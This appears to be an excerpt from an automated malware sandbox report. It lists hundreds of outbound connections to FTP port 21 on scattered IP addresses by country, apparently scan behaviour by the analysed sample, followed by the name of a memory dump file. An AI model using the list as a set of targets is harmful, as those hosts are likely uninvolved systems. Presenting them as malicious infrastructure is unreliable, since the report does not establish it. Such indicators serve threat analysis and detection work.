US 146.123.166.9:21 tcp
US 100.180.206.9:21 tcp
US 65.161.80.9:21 tcp
GB 25.157.177.9:21 tcp
IE 185.67.22.9:21 tcp
JP 27.83.136.9:21 tcp
DE 91.249.112.9:21 tcp
US 96.6.58.9:21 tcp
US 21.131.58.9:21 tcp
CA 142.52.146.9:21 tcp
DE 84.119.99.9:21 tcp
CN 36.222.85.9:21 tcp
US 44.181.249.9:21 tcp
US 170.1.136.9:21 tcp
CN 61.55.82.10:21 tcp
PH 175.158.208.10:21 tcp
US 167.31.253.10:21 tcp
KR 223.174.144.10:21 tcp
US 28.96.146.10:21 tcp
US 137.145.179.10:21 tcp
CN 210.83.234.10:21 tcp
US 47.178.120.10:21 tcp
BR 189.125.156.10:21 tcp
PL 83.11.241.10:21 tcp
US 162.151.146.10:21 tcp
US 192.96.212.10:21 tcp
US 158.164.159.10:21 tcp
VE 186.89.185.10:21 tcp
US 35.119.182.10:21 tcp
US 64.142.182.10:21 tcp
CN 117.13.25.10:21 tcp
JP 126.122.159.10:21 tcp
EG 41.40.145.10:21 tcp
ES 195.55.193.10:21 tcp
US 161.241.176.10:21 tcp
DK 188.215.86.10:21 tcp
AR 181.27.44.10:21 tcp
UA 62.16.29.10:21 tcp
CN 58.194.110.10:21 tcp
US 184.125.112.10:21 tcp
AU 112.141.166.10:21 tcp
US 160.41.84.10:21 tcp
US 28.55.109.10:21 tcp
US 107.157.144.10:21 tcp
AU 203.143.195.10:21 tcp
DE 134.104.187.10:21 tcp
US 131.89.24.10:21 tcp
RU 178.20.182.10:21 tcp
US 26.134.102.10:21 tcp
US 152.60.234.10:21 tcp
US 75.142.182.10:21 tcp
US 12.158.254.10:21 tcp
VN 14.243.212.10:21 tcp
US 63.29.35.10:21 tcp
CN 113.125.35.10:21 tcp
JP 122.197.249.10:21 tcp
US 75.72.42.10:21 tcp
BE 109.132.157.10:21 tcp
JP 126.8.118.10:21 tcp
KR 124.138.232.10:21 tcp
KR 14.86.140.10:21 tcp
IT 213.213.120.10:21 tcp
US 192.6.114.10:21 tcp
PH 202.129.238.10:21 tcp
PK 116.0.61.10:21 tcp
CN 36.59.78.10:21 tcp
US 38.75.68.10:21 tcp
US 166.102.232.10:21 tcp
CN 14.135.123.10:21 tcp
FR 131.254.140.10:21 tcp
US 4.97.39.10:21 tcp
NL 94.168.136.10:21 tcp
LT 83.181.91.10:21 tcp
CH 81.62.32.10:21 tcp
HK 203.186.38.10:21 tcp
IT 159.213.159.10:21 tcp
BR 187.98.216.10:21 tcp
KR 106.240.120.10:21 tcp
US 215.198.109.10:21 tcp
CH 57.36.40.10:21 tcp
NL 62.207.149.10:21 tcp
FR 194.53.6.10:21 tcp
US 158.228.34.10:21 tcp
US 23.200.247.10:21 tcp
US 24.101.216.10:21 tcp
JP 219.1.44.10:21 tcp
US 3.52.208.10:21 tcp
US 28.98.147.10:21 tcp
US 33.27.169.10:21 tcp
US 172.159.93.10:21 tcp
US 33.80.78.10:21 tcp
SE 131.115.68.10:21 tcp
US 7.52.179.10:21 tcp
US 169.130.238.10:21 tcp
US 167.138.225.10:21 tcp
GB 157.140.1.10:21 tcp
ZA 196.13.220.10:21 tcp
US 3.246.162.10:21 tcp
BR 200.135.91.10:21 tcp
US 11.180.49.11:21 tcp
US 166.187.195.11:21 tcp
CL 186.67.24.11:21 tcp
DE 188.46.61.11:21 tcp
GB 25.115.222.11:21 tcp
AU 121.223.133.11:21 tcp
US 163.187.140.11:21 tcp
CN 36.207.107.11:21 tcp
US 156.138.34.11:21 tcp
US 67.104.97.11:21 tcp
EG 197.62.52.11:21 tcp
US 63.23.255.11:21 tcp
US 12.80.225.11:21 tcp
CN 61.55.32.11:21 tcp
US 48.178.179.11:21 tcp
LU 146.220.182.11:21 tcp
DE 53.223.117.11:21 tcp
GB 150.204.117.11:21 tcp
US 7.194.84.11:21 tcp
US 158.68.177.11:21 tcp
US 13.18.208.11:21 tcp
AU 13.210.120.11:21 tcp
DE 79.213.53.11:21 tcp
US 131.7.219.11:21 tcp
US 13.164.104.11:21 tcp
US 141.181.1.11:21 tcp
US 130.109.156.11:21 tcp
ZA 192.96.8.11:21 tcp
US 4.151.185.11:21 tcp
US 76.148.156.11:21 tcp
RU 37.145.218.11:21 tcp
IR 151.233.94.11:21 tcp
US 207.240.104.11:21 tcp
US 135.217.146.11:21 tcp
PL 83.13.149.11:21 tcp
US 216.60.24.11:21 tcp
EG 156.191.143.11:21 tcp
US 21.145.182.11:21 tcp
IT 5.171.218.11:21 tcp
CN 119.3.117.11:21 tcp
VN 171.236.146.11:21 tcp
RU 188.18.8.11:21 tcp
BR 177.171.195.11:21 tcp
DE 53.83.99.11:21 tcp
US 141.142.136.11:21 tcp
US 199.138.37.11:21 tcp
US 216.171.208.11:21 tcp
KE 196.99.228.11:21 tcp
US 71.138.208.11:21 tcp
CN 175.3.78.11:21 tcp
CN 218.80.14.11:21 tcp
US 107.187.192.11:21 tcp
US 99.193.141.11:21 tcp
CN 14.125.234.11:21 tcp
US 55.233.57.11:21 tcp
SE 52.121.193.11:21 tcp
US 3.50.143.11:21 tcp
SK 147.213.120.11:21 tcp
US 104.178.212.11:21 tcp
CN 39.102.98.11:21 tcp
US 70.159.7.11:21 tcp
US 21.35.127.11:21 tcp
RU 37.147.87.11:21 tcp
FI 62.240.89.11:21 tcp
US 11.193.172.11:21 tcp
US 198.82.29.11:21 tcp
CN 113.62.143.11:21 tcp
US 156.85.100.11:21 tcp
GB 92.23.45.11:21 tcp
DE 53.88.6.11:21 tcp
KZ 2.78.228.11:21 tcp
US 143.31.83.11:21 tcp
CN 113.83.202.11:21 tcp
BR 179.72.172.11:21 tcp
US 143.166.134.11:21 tcp
US 70.63.18.11:21 tcp
PL 83.21.155.11:21 tcp
US 13.0.38.11:21 tcp
CN 223.198.161.11:21 tcp
CN 220.200.145.11:21 tcp
US 98.117.136.11:21 tcp
TW 42.68.55.11:21 tcp
AT 91.112.217.11:21 tcp
US 206.62.30.11:21 tcp
DE 217.85.97.11:21 tcp
SE 62.68.67.11:21 tcp
BR 189.52.35.11:21 tcp
GB 178.96.231.12:21 tcp
US 8.123.138.12:21 tcp
CN 101.76.26.12:21 tcp
KR 106.240.6.12:21 tcp
RU 5.44.172.12:21 tcp
US 65.161.189.12:21 tcp
CA 138.119.47.12:21 tcp
KR 106.247.155.12:21 tcp
CN 59.44.70.12:21 tcp
CL 191.125.37.12:21 tcp
IN 144.16.208.12:21 tcp
US 44.109.176.12:21 tcp
KR 59.31.44.12:21 tcp
US 159.204.110.12:21 tcp
ID 103.31.37.12:21 tcp
US 54.129.5.12:21 tcp
JP 133.37.132.12:21 tcp
ID 120.161.159.12:21 tcp
CH 92.106.244.12:21 tcp
US 40.217.218.12:21 tcp
US 144.129.217.12:21 tcp
CN 175.88.215.12:21 tcp
CN 114.223.19.12:21 tcp
DE 46.90.82.12:21 tcp
N/A 36.200.212.12:21 tcp
N/A 219.49.133.12:21 tcp
N/A 120.197.114.12:21 tcp
N/A 71.159.220.12:21 tcp
N/A 1.178.202.12:21 tcp
N/A 118.151.11.12:21 tcp
N/A 174.46.106.12:21 tcp
N/A 211.179.125.12:21 tcp
N/A 35.6.170.12:21 tcp
N/A 67.65.16.12:21 tcp
N/A 41.114.35.12:21 tcp
N/A 36.3.16.12:21 tcp
N/A 119.148.202.12:21 tcp
N/A 42.20.254.12:21 tcp
N/A 209.78.14.12:21 tcp
N/A 103.249.94.12:21 tcp
N/A 132.253.58.12:21 tcp
N/A 40.20.123.12:21 tcp
N/A 103.230.254.12:21 tcp
N/A 216.227.176.12:21 tcp
N/A 186.63.169.12:21 tcp
N/A 156.230.140.12:21 tcp
N/A 79.101.202.12:21 tcp
N/A 30.88.157.12:21 tcp
N/A 114.213.166.12:21 tcp
N/A 57.6.110.12:21 tcp
N/A 118.40.210.12:21 tcp
N/A 122.38.87.12:21 tcp
N/A 132.150.226.12:21 tcp
N/A 167.187.16.12:21 tcp
N/A 24.191.185.12:21 tcp
N/A 35.33.133.12:21 tcp
N/A 215.20.84.12:21 tcp
N/A 120.145.78.12:21 tcp

Files

memory/4368-0-0x0000000000400000-0x0000000000421000-memory.dmp